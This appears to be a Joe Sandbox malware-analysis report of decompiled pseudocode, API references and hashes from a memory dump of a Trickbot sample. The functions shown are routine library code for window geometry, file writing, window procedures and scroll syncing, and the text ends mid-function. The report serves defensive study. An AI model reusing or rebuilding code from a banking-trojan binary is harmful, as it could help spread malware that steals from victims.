				int _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t106;
				int _t120;
				void* _t128;
				void* _t132;
				intOrPtr _t138;
				void* _t140;
				void* _t143;

				_t140 = __edi;
				_t128 = __ecx;
				_t79 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t132 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t138 =  *((intOrPtr*)(__ecx + 0x8c));
				_t143 = 2;
				if(_t138 == 0xa) {
					L7:
					 *((intOrPtr*)(_t128 + 0x28)) =  *((intOrPtr*)(_t128 + 0x28)) + _t79;
					L9:
					_t81 =  *((intOrPtr*)(_t128 + 0x30)) -  *((intOrPtr*)(_t128 + 0x28));
					__eflags = _t81;
					L10:
					if(_t81 < 0) {
						_t81 = 0;
					}
					_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x68)))) + 0xbc))( &(_v28.right), _t81, _t143, _t140);
					_v12 =  *_t83;
					_v8 =  *((intOrPtr*)(_t83 + 4));
					GetWindowRect(GetDesktopWindow(),  &_v60);
					asm("movsd");
					asm("movsd");
					_t87 =  *((intOrPtr*)(_t128 + 0x8c));
					asm("movsd");
					asm("movsd");
					if(_t87 == 0xa || _t87 == 0xc) {
						_v44.left =  *((intOrPtr*)(_t128 + 0x58)) -  *((intOrPtr*)(_t128 + 0x60)) - _v12 + _v44.right;
						_v44.top =  *((intOrPtr*)(_t128 + 0x5c)) -  *((intOrPtr*)(_t128 + 0x64)) - _v8 + _v44.bottom;
						__eflags = IntersectRect( &_v28,  &_v60,  &_v44);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t128 + 0x38)) =  *((intOrPtr*)(_t128 + 0x40)) - _v12;
							_t106 =  *((intOrPtr*)(_t128 + 0x44)) - _v8;
							__eflags = _t106;
							 *((intOrPtr*)(_t128 + 0x3c)) = _t106;
							 *(_t128 + 0x48) = _v44.left;
							 *((intOrPtr*)(_t128 + 0x4c)) = _v44.top;
						}
					} else {
						_v44.right =  *((intOrPtr*)(_t128 + 0x60)) -  *((intOrPtr*)(_t128 + 0x58)) + _v44.left + _v12;
						_v44.bottom =  *((intOrPtr*)(_t128 + 0x64)) -  *((intOrPtr*)(_t128 + 0x5c)) + _v44.top + _v8;
						_t120 = IntersectRect( &_v28,  &_v60,  &_v44);
						_t152 = _t120;
						if(_t120 != 0) {
							 *((intOrPtr*)(_t128 + 0x40)) =  *((intOrPtr*)(_t128 + 0x38)) + _v12;
							 *((intOrPtr*)(_t128 + 0x44)) =  *((intOrPtr*)(_t128 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t128 + 0x50)) = _v44.right;
							 *((intOrPtr*)(_t128 + 0x54)) = _v44.bottom;
						}
					}
					 *((intOrPtr*)(_t128 + 4)) = _a4;
					 *((intOrPtr*)(_t128 + 8)) = _a8;
					return E0042A6F8(_t128, _t152, 0);
				}
				if(_t138 == 0xb) {
					__eflags = _t138 - 0xa;
					if(_t138 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t79;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t143 = 0x22;
					if(_t138 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t132;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t132;
					}
					_t81 =  *((intOrPtr*)(_t128 + 0x34)) -  *((intOrPtr*)(_t128 + 0x2c));
					goto L10;
				}
			}

0x0042a36a
0x0042a374
0x0042a37f
0x0042a384
0x0042a386
0x0042a38f
0x0042a390
0x0042a3b4
0x0042a3b4
0x0042a3bc
0x0042a3bf
0x0042a3bf
0x0042a3c2
0x0042a3c4
0x0042a3c6
0x0042a3c6
0x0042a3d4
0x0042a3dc
0x0042a3e2
0x0042a3f0
0x0042a3fc
0x0042a3fd
0x0042a3fe
0x0042a404
0x0042a405
0x0042a40a
0x0042a471
0x0042a480
0x0042a495
0x0042a497
0x0042a49f
0x0042a4a5
0x0042a4a5
0x0042a4a8
0x0042a4ae
0x0042a4b4
0x0042a4b4
0x0042a411
0x0042a41d
0x0042a42c
0x0042a43b
0x0042a441
0x0042a443
0x0042a44b
0x0042a454
0x0042a45a
0x0042a460
0x0042a460
0x0042a443
0x0042a4bc
0x0042a4c4
0x0042a4cf
0x0042a4cf
0x0042a395
0x0042a3af
0x0042a3b2
0x0042a3b9
0x0042a3b9
0x0042a3b9
0x00000000
0x0042a3b9
0x00000000
0x0042a397
0x0042a39c
0x0042a39d
0x0042a3a4
0x0042a3a4
0x0042a3a4
0x0042a39f
0x0042a39f
0x0042a39f
0x0042a3aa
0x00000000
0x0042a3aa

APIs

GetDesktopWindow.USER32 ref: 0042A3E5
GetWindowRect.USER32(00000000,?), ref: 0042A3F0
IntersectRect.USER32(?,?,?), ref: 0042A43B
IntersectRect.USER32(?,?,?), ref: 0042A48F

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$IntersectWindow$Desktop
String ID:
API String ID: 123605412-0
Opcode ID: fe78f2042b7b174f35b22b0f9df7314247878f01abb06aef3db3a54cb2751053
Instruction ID: b984713fc8ff7a10234e45fea70fccfde9293b4f09dbd1641c29374badb9b0a2
Opcode Fuzzy Hash: fe78f2042b7b174f35b22b0f9df7314247878f01abb06aef3db3a54cb2751053
Instruction Fuzzy Hash: DB51D472A00209DFCF44DFA8D5C4A9EBBF8BF08310B544196ED05EB20AE634E981CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB5B, Relevance: 6.1, APIs: 4, Instructions: 135
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040BB5B(long _a4, void* _a8, long _a12) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				void _v1048;
				void** _t66;
				signed int _t67;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;
				signed int _t80;
				int _t85;
				long _t87;
				intOrPtr* _t91;
				intOrPtr _t97;
				struct _OVERLAPPED* _t101;
				long _t103;
				signed int _t105;
				struct _OVERLAPPED* _t106;

				_t101 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_a12 != 0) {
					_t91 = 0x44cfa0 + (_a4 >> 5) * 4;
					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
					if(__eflags != 0) {
						E0040BA83(__eflags, _a4, 0, 2);
					}
					_t66 =  *_t91 + _t105;
					__eflags = _t66[1] & 0x00000080;
					if((_t66[1] & 0x00000080) == 0) {
						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
						__eflags = _t67;
						if(_t67 == 0) {
							_a4 = GetLastError();
						} else {
							_a4 = _t101;
							_v12 = _v16;
						}
						L15:
						_t69 = _v12;
						__eflags = _t69 - _t101;
						if(_t69 != _t101) {
							_t70 = _t69 - _v20;
							__eflags = _t70;
							return _t70;
						}
						__eflags = _a4 - _t101;
						if(_a4 == _t101) {
							L25:
							_t71 =  *_t91;
							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
								L27:
								 *((intOrPtr*)(E00406860())) = 0x1c;
								_t73 = E00406869();
								 *_t73 = _t101;
								L24:
								return _t73 | 0xffffffff;
							}
							__eflags =  *_a8 - 0x1a;
							if( *_a8 == 0x1a) {
								goto L1;
							}
							goto L27;
						}
						_t106 = 5;
						__eflags = _a4 - _t106;
						if(_a4 != _t106) {
							_t73 = E004067ED(_a4);
						} else {
							 *((intOrPtr*)(E00406860())) = 9;
							_t73 = E00406869();
							 *_t73 = _t106;
						}
						goto L24;
					}
					__eflags = _a12 - _t101;
					_v8 = _a8;
					_a4 = _t101;
					if(_a12 <= _t101) {
						goto L25;
					} else {
						goto L6;
					}
					do {
						L6:
						_t80 =  &_v1048;
						do {
							__eflags = _v8 - _a8 - _a12;
							if(_v8 - _a8 >= _a12) {
								break;
							}
							_v8 = _v8 + 1;
							_t97 =  *_v8;
							__eflags = _t97 - 0xa;
							if(_t97 == 0xa) {
								_v20 = _v20 + 1;
								 *_t80 = 0xd;
								_t80 = _t80 + 1;
								__eflags = _t80;
							}
							 *_t80 = _t97;
							_t80 = _t80 + 1;
							__eflags = _t80 -  &_v1048 - 0x400;
						} while (_t80 -  &_v1048 < 0x400);
						_t103 = _t80 -  &_v1048;
						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0);
						__eflags = _t85;
						if(_t85 == 0) {
							_a4 = GetLastError();
							break;
						}
						_t87 = _v16;
						_v12 = _v12 + _t87;
						__eflags = _t87 - _t103;
						if(_t87 < _t103) {
							break;
						}
						__eflags = _v8 - _a8 - _a12;
					} while (_v8 - _a8 < _a12);
					_t101 = 0;
					__eflags = 0;
					goto L15;
				}
				L1:
				return 0;
			}

0x0040bb67
0x0040bb6c
0x0040bb6f
0x0040bb72
0x0040bb81
0x0040bb93
0x0040bb96
0x0040bb9b
0x0040bba3
0x0040bba8
0x0040bbad
0x0040bbaf
0x0040bbb3
0x0040bc87
0x0040bc8d
0x0040bc8f
0x0040bca2
0x0040bc91
0x0040bc94
0x0040bc97
0x0040bc97
0x0040bc43
0x0040bc43
0x0040bc46
0x0040bc48
0x0040bcde
0x0040bcde
0x00000000
0x0040bcde
0x0040bc4e
0x0040bc51
0x0040bcb5
0x0040bcb5
0x0040bcb7
0x0040bcbc
0x0040bcca
0x0040bccf
0x0040bcd5
0x0040bcda
0x0040bcb0
0x00000000
0x0040bcb0
0x0040bcc1
0x0040bcc4
0x00000000
0x00000000
0x00000000
0x0040bcc4
0x0040bc55
0x0040bc56
0x0040bc59
0x0040bcaa
0x0040bc5b
0x0040bc60
0x0040bc66
0x0040bc6b
0x0040bc6b
0x00000000
0x0040bc59
0x0040bbbc
0x0040bbbf
0x0040bbc2
0x0040bbc5
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bbcb
0x0040bbcb
0x0040bbcb
0x0040bbd1
0x0040bbd7
0x0040bbda
0x00000000
0x00000000
0x0040bbdf
0x0040bbe2
0x0040bbe4
0x0040bbe7
0x0040bbe9
0x0040bbec
0x0040bbef
0x0040bbef
0x0040bbef
0x0040bbf0
0x0040bbf2
0x0040bbfd
0x0040bbfd
0x0040bc0d
0x0040bc22
0x0040bc28
0x0040bc2a
0x0040bc75
0x00000000
0x0040bc75
0x0040bc2c
0x0040bc2f
0x0040bc32
0x0040bc34
0x00000000
0x00000000
0x0040bc3c
0x0040bc3c
0x0040bc41
0x0040bc41
0x00000000
0x0040bc41
0x0040bb74
0x00000000

APIs

WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 0040BC22

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: a172aba5220f98fc3a333bd479217c1d463cf4d580b45437f1a802cbb9e3f3e7
Instruction ID: bb18ad5826797089b7b1e337a36143c6159ac971af168ef9565c0ae5ec806fe2
Opcode Fuzzy Hash: a172aba5220f98fc3a333bd479217c1d463cf4d580b45437f1a802cbb9e3f3e7
Instruction Fuzzy Hash: E151B031904208EFDF11CF69C884A9E7BB0FF45340F2485BAE816AB291DB34DA40CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 004132C0, Relevance: 6.1, APIs: 4, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E004132C0(struct HWND__* _a4, void* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				long _v8;
				void* _t17;
				signed int _t21;
				signed int _t27;
				intOrPtr _t33;
				void* _t37;
				struct HWND__* _t38;
				intOrPtr* _t40;

				_t37 = _a8;
				_t50 = _t37 - 0x82;
				if(_t37 != 0x82) {
					_t38 = _a4;
					_t17 = GetPropA(_t38, 0);
					_t40 = _a16;
					__eflags = _t17;
					_push(_t40);
					_t33 = _a20;
					_push(_a12);
					_push(_t37);
					_push(_t38);
					_push(_t33);
					_push(_t38);
					if(__eflags == 0) {
						_v8 = CallWindowProcA(E00410610(__eflags), ??, ??, ??, ??);
						__eflags = _t33 - 3;
						if(_t33 != 3) {
							_t21 = _v8;
							goto L8;
						} else {
							_t21 = GetWindowLongA(_t38, 0xfffffff0);
							__eflags = (_t21 & 0x00000003) - 2;
							if((_t21 & 0x00000003) != 2) {
								L8:
								__eflags = _t37 - 0x18;
								if(__eflags > 0) {
									__eflags = _t37 - 0x46;
									if(_t37 == 0x46) {
										__eflags =  *0x44d360 - 0x30a;
										if( *0x44d360 >= 0x30a) {
											E004122E0(_t38, _t40);
										}
										goto L11;
									} else {
										__eflags = _t37 - 0x1943;
										if(_t37 < 0x1943) {
											goto L11;
										} else {
											__eflags = _t37 - 0x1944;
											if(_t37 <= 0x1944) {
												 *_t40 = 1;
												return 0x3ea;
											} else {
												goto L11;
											}
										}
									}
								} else {
									if(__eflags == 0) {
										__eflags =  *0x44d360 - 0x30a;
										if( *0x44d360 < 0x30a) {
											__eflags = _a8;
											if(_a8 == 0) {
												E004122E0(_t38, 0);
											}
										}
									} else {
										__eflags = _t37 - 0xf;
										if(_t37 == 0xf) {
											__eflags = _t33 - 3;
											if(_t33 != 3) {
												L19:
												E00412F80(_t38, 1, _t33);
											} else {
												_t27 = _t21 & 0x00000003;
												__eflags = _t27 - 2;
												if(_t27 == 2) {
													goto L19;
												} else {
													__eflags = _t27 - 3;
													if(_t27 == 3) {
														goto L19;
													}
												}
											}
										}
									}
									L11:
									return _v8;
								}
							} else {
								return _v8;
							}
						}
					} else {
						return CallWindowProcA(E00410610(__eflags), ??, ??, ??, ??);
					}
				} else {
					return E00410840(_t50, _a4, _t37, _a12, _a16, _a20);
				}
			}

0x004132c7
0x004132cb
0x004132d1
0x004132fa
0x00413306
0x0041330c
0x00413310
0x00413316
0x00413317
0x0041331b
0x0041331c
0x0041331d
0x0041331e
0x0041331f
0x00413320
0x0041334a
0x0041334e
0x00413351
0x00413372
0x00000000
0x00413353
0x00413356
0x00413361
0x00413364
0x00413376
0x00413376
0x00413379
0x0041338e
0x00413391
0x004133e4
0x004133ed
0x004133f1
0x004133f6
0x00000000
0x00413393
0x00413393
0x00413399
0x00000000
0x0041339b
0x0041339b
0x004133a1
0x00413400
0x0041340e
0x004133a3
0x00000000
0x004133a3
0x004133a1
0x00413399
0x0041337b
0x0041337b
0x004133c5
0x004133ce
0x004133d0
0x004133d5
0x004133da
0x004133df
0x004133d5
0x0041337d
0x0041337d
0x00413380
0x004133a5
0x004133a8
0x004133b7
0x004133bb
0x004133aa
0x004133aa
0x004133ad
0x004133b0
0x00000000
0x004133b2
0x004133b2
0x004133b5
0x00000000
0x00000000
0x004133b5
0x004133b0
0x004133a8
0x00413380
0x00413382
0x0041338d
0x0041338d
0x00413366
0x00413371
0x00413371
0x00413364
0x00413322
0x0041333a
0x0041333a
0x004132d3
0x004132f7
0x004132f7

APIs

GetPropA.USER32(?,00000000), ref: 00413306
CallWindowProcA.USER32(00000000), ref: 00413331

Part of subcall function 00410840: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 00410866
Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041087E
Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041088A

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 45dbdcf38811c861a943161a7cfed4aa96dd1d290477e3be477d3d217b4d6fdd
Instruction ID: b98b64c3d47a9ee9caab4dddbef3177f36755a28518fe7ae4d998241309dde71
Opcode Fuzzy Hash: 45dbdcf38811c861a943161a7cfed4aa96dd1d290477e3be477d3d217b4d6fdd
Instruction Fuzzy Hash: 1D311976B40208A7D6109E09FC459EF7398EB86326F44066BFD14D3241DB2DAFC9826F

Uniqueness

Uniqueness Score: -1.00%

Function 00426D4A, Relevance: 6.1, APIs: 4, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00426D4A(intOrPtr __ecx, void* __eflags, int _a4, signed char _a8, signed int _a9, intOrPtr _a12) {
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				int _v24;
				intOrPtr _v28;
				char _v32;
				void* _t56;
				intOrPtr _t60;
				intOrPtr* _t68;
				intOrPtr* _t74;
				void* _t78;
				int _t79;
				void* _t100;
				void* _t101;
				void* _t103;
				intOrPtr* _t104;

				_t104 = _a4;
				_v8 = __ecx;
				_t56 = E00424B1C(__ecx, _t104,  &_v20,  &_v32);
				if(_t56 == 0) {
					return _t56;
				}
				_t79 = 0;
				_v12 = 0;
				_v16 = 0;
				_t101 =  *((intOrPtr*)( *_t104 + 0x68))(1, _t100, _t78);
				if(_t101 != 0) {
					_v16 = GetScrollPos( *(_t101 + 0x1c), 2);
				}
				_v24 = _t79;
				_t60 =  *((intOrPtr*)( *_t104 + 0x68))(_t79);
				_v28 = _t60;
				if(_t60 != _t79) {
					_v24 = GetScrollPos( *(_t60 + 0x1c), 2);
				}
				_push(_a12);
				_push(_t79);
				_push(_a8);
				if( *((intOrPtr*)( *_t104 + 0xbc))() != 0) {
					_v12 = 1;
				}
				if(_t101 == _t79) {
					L14:
					if(_v28 == _t79) {
						L20:
						return _v12;
					}
					_t103 = 0;
					if( *((intOrPtr*)(_v8 + 0x68)) <= _t79) {
						goto L20;
					} else {
						goto L16;
					}
					do {
						L16:
						if(_t103 != _v20) {
							SetScrollPos( *(_v28 + 0x1c), 2, _v24, _t79);
							_t68 = E00424B00(_v8, _t103, _v32);
							_push(_a12);
							_push(_t79);
							_push(_a8 & 0x000000ff | 0x000000ff);
							if( *((intOrPtr*)( *_t68 + 0xbc))() != 0) {
								_v12 = 1;
							}
						}
						_t103 = _t103 + 1;
					} while (_t103 <  *((intOrPtr*)(_v8 + 0x68)));
					goto L20;
				} else {
					_a4 = _t79;
					if( *((intOrPtr*)(_v8 + 0x6c)) <= _t79) {
						goto L14;
					} else {
						goto L9;
					}
					do {
						L9:
						if(_a4 != _v32) {
							SetScrollPos( *(_t101 + 0x1c), 2, _v16, _t79);
							_t74 = E00424B00(_v8, _v20, _a4);
							_push(_a12);
							_push(_t79);
							_push(_a9 & 0x0000ffff | 0x000000ff);
							if( *((intOrPtr*)( *_t74 + 0xbc))() != 0) {
								_v12 = 1;
							}
							_t79 = 0;
						}
						_a4 = _a4 + 1;
					} while (_a4 <  *((intOrPtr*)(_v8 + 0x6c)));
					goto L14;
				}
			}

0x00426d54
0x00426d5b
0x00426d60
0x00426d67
0x00426e9e
0x00426e9e
0x00426d71
0x00426d77
0x00426d7a
0x00426d80
0x00426d84
0x00426d91
0x00426d91
0x00426d99
0x00426d9c
0x00426da1
0x00426da4
0x00426db1
0x00426db1
0x00426db4
0x00426dbb
0x00426dbc
0x00426dc7
0x00426dc9
0x00426dc9
0x00426dd8
0x00426e3f
0x00426e42
0x00426e97
0x00000000
0x00426e9b
0x00426e47
0x00426e4c
0x00000000
0x00000000
0x00000000
0x00000000
0x00426e4e
0x00426e4e
0x00426e51
0x00426e5f
0x00426e68
0x00426e71
0x00426e79
0x00426e7a
0x00426e85
0x00426e87
0x00426e87
0x00426e85
0x00426e91
0x00426e92
0x00000000
0x00426dda
0x00426ddd
0x00426de3
0x00000000
0x00000000
0x00000000
0x00000000
0x00426de5
0x00426de5
0x00426deb
0x00426df6
0x00426e01
0x00426e06
0x00426e10
0x00426e1b
0x00426e26
0x00426e28
0x00426e28
0x00426e2f
0x00426e2f
0x00426e31
0x00426e3a
0x00000000
0x00426de5

APIs

Part of subcall function 00424B1C: GetDlgCtrlID.USER32(?), ref: 00424B2A
Part of subcall function 00424B1C: IsChild.USER32(?,?), ref: 00424B3E

GetScrollPos.USER32(?,00000002), ref: 00426D8B
GetScrollPos.USER32(?,00000002), ref: 00426DAB
SetScrollPos.USER32(?,00000002,?,00000000), ref: 00426DF6
SetScrollPos.USER32(?,00000002,?,00000000), ref: 00426E5F

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Scroll$ChildCtrl
String ID:
API String ID: 656700424-0
Opcode ID: 6353dc9dcd4ac7a6220cdb68b813c80304ceb8b84d5b842803d72ebc2d6144a4
Instruction ID: b7d6994942247ff049465cf3fabc1c5a7a62e4cb7689a6856a83465d6b19d131
Opcode Fuzzy Hash: 6353dc9dcd4ac7a6220cdb68b813c80304ceb8b84d5b842803d72ebc2d6144a4
Instruction Fuzzy Hash: 85414C75A00219EFDF10DFA5D885EAEBBB9FF44310F51806AE905A7291C734AD40CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00426EA1, Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00426EA1(intOrPtr __ecx, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				char _v20;
				int _v24;
				char _v28;
				intOrPtr _v32;
				void* _t63;
				intOrPtr _t67;
				intOrPtr* _t74;
				intOrPtr* _t79;
				void* _t83;
				intOrPtr _t85;
				void* _t99;
				void* _t100;
				intOrPtr _t101;
				intOrPtr* _t103;

				_t103 = _a4;
				_v16 = __ecx;
				_t63 = E00424B1C(__ecx, _t103,  &_v20,  &_v28);
				if(_t63 == 0) {
					return _t63;
				}
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t100 =  *((intOrPtr*)( *_t103 + 0x68))(1, _t99, _t83);
				if(_t100 != 0) {
					_v12 = GetScrollPos( *(_t100 + 0x1c), 2);
				}
				_v24 = _v24 & 0x00000000;
				_t67 =  *((intOrPtr*)( *_t103 + 0x68))(0);
				_v32 = _t67;
				if(_t67 != 0) {
					_v24 = GetScrollPos( *(_t67 + 0x1c), 2);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				if( *((intOrPtr*)( *_t103 + 0xc0))() != 0) {
					_v8 = 1;
				}
				if(_t100 == 0) {
					_t85 = _v16;
				} else {
					_t85 = _v16;
					_a4 = _a4 & 0x00000000;
					if( *((intOrPtr*)(_t85 + 0x6c)) <= 0) {
						L15:
						_t101 = _v32;
						if(_t101 == 0) {
							L21:
							return _v8;
						}
						_a4 = _a4 & 0x00000000;
						if( *((intOrPtr*)(_t85 + 0x68)) <= 0) {
							goto L21;
						} else {
							goto L17;
						}
						do {
							L17:
							if(_a4 != _v20) {
								SetScrollPos( *(_t101 + 0x1c), 2, _v24, 0);
								_t74 = E00424B00(_t85, _a4, _v28);
								_push(_a16);
								_push(0);
								_push(_a8);
								if( *((intOrPtr*)( *_t74 + 0xc0))() != 0) {
									_v8 = 1;
								}
							}
							_a4 = _a4 + 1;
						} while (_a4 <  *((intOrPtr*)(_t85 + 0x68)));
						goto L21;
					} else {
						goto L9;
					}
					do {
						L9:
						if(_a4 != _v28) {
							SetScrollPos( *(_t100 + 0x1c), 2, _v12, 0);
							_t79 = E00424B00(_t85, _v20, _a4);
							_push(_a16);
							_push(_a12);
							_push(0);
							if( *((intOrPtr*)( *_t79 + 0xc0))() != 0) {
								_v8 = 1;
							}
						}
						_a4 = _a4 + 1;
					} while (_a4 <  *((intOrPtr*)(_t85 + 0x6c)));
				}
			}

0x00426eab
0x00426eb2
0x00426eb7
0x00426ebe
0x00426ff1
0x00426ff1
0x00426ec6
0x00426eca
0x00426edd
0x00426ee1
0x00426eea
0x00426eea
0x00426eef
0x00426ef7
0x00426efc
0x00426eff
0x00426f08
0x00426f08
0x00426f0b
0x00426f12
0x00426f15
0x00426f20
0x00426f22
0x00426f22
0x00426f31
0x00426f8c
0x00426f33
0x00426f33
0x00426f36
0x00426f3e
0x00426f8f
0x00426f8f
0x00426f94
0x00426fea
0x00000000
0x00426fee
0x00426f96
0x00426f9e
0x00000000
0x00000000
0x00000000
0x00000000
0x00426fa0
0x00426fa0
0x00426fa6
0x00426fb2
0x00426fbc
0x00426fc1
0x00426fc8
0x00426fcb
0x00426fd6
0x00426fd8
0x00426fd8
0x00426fd6
0x00426fdf
0x00426fe5
0x00000000
0x00000000
0x00000000
0x00000000
0x00426f40
0x00426f40
0x00426f46
0x00426f52
0x00426f5c
0x00426f61
0x00426f68
0x00426f6b
0x00426f76
0x00426f78
0x00426f78
0x00426f76
0x00426f7f
0x00426f85
0x00426f8a

APIs

Part of subcall function 00424B1C: GetDlgCtrlID.USER32(?), ref: 00424B2A
Part of subcall function 00424B1C: IsChild.USER32(?,?), ref: 00424B3E

GetScrollPos.USER32(?,00000002), ref: 00426EE8
GetScrollPos.USER32(?,00000002), ref: 00426F06
SetScrollPos.USER32(?,00000002,00000000,00000000), ref: 00426F52
SetScrollPos.USER32(?,00000002,00000000,00000000), ref: 00426FB2

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Scroll$ChildCtrl
String ID:
API String ID: 656700424-0
Opcode ID: 767dd63529825d7f2e48d1541d4dc86c93cca7101560a43602e8b918d92667c5
Instruction ID: 4c8f1e1ae9dcd58102175802ba172434e51234b086cff7a4be34fc1ee9304588
Opcode Fuzzy Hash: 767dd63529825d7f2e48d1541d4dc86c93cca7101560a43602e8b918d92667c5
Instruction Fuzzy Hash: D7413431A00219AFDF11DF54E985BAEBBB5FF44304F62806AF804AB291C775EE50DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00434E7C, Relevance: 6.1, APIs: 4, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00434E7C(void* __ecx, int _a4, int _a8, int _a12) {
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t66;
				int _t68;
				void* _t69;
				intOrPtr _t75;
				intOrPtr* _t78;
				signed short _t94;
				intOrPtr* _t107;
				signed int _t110;
				int* _t111;
				intOrPtr _t113;
				void* _t114;

				_t114 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xec)) != 0) {
					_t89 = _a4;
					_t60 =  *((intOrPtr*)(__ecx + 0x90));
					 *(__ecx + 0xf8) = 1;
					_t110 = _a4 + _a4 * 4 << 3;
					 *((intOrPtr*)(_t60 + 0x20)) =  *((intOrPtr*)(_t60 + _t110 + 0x20));
					 *((intOrPtr*)(_t60 + 0x24)) =  *((intOrPtr*)(_t60 + _t110 + 0x24));
					_t61 =  *((intOrPtr*)(__ecx + 0x90));
					 *((intOrPtr*)(_t61 + 0x10)) =  *((intOrPtr*)(_t61 + _t110 + 0x10));
					 *((intOrPtr*)(_t61 + 0x14)) =  *((intOrPtr*)(_t61 + _t110 + 0x14));
					E00434FEB(__ecx,  *((intOrPtr*)(__ecx + 0xf4)) + _t89, 0);
					E004345A6(__ecx,  *((intOrPtr*)(_t61 + _t110 + 0x14)), __eflags, 0);
					_t66 =  *((intOrPtr*)(_t114 + 0x90));
					_t111 = _t110 + _t66 + 0x18;
					_a8 = MulDiv(_a8,  *_t111,  *(_t110 + _t66 + 0x1c));
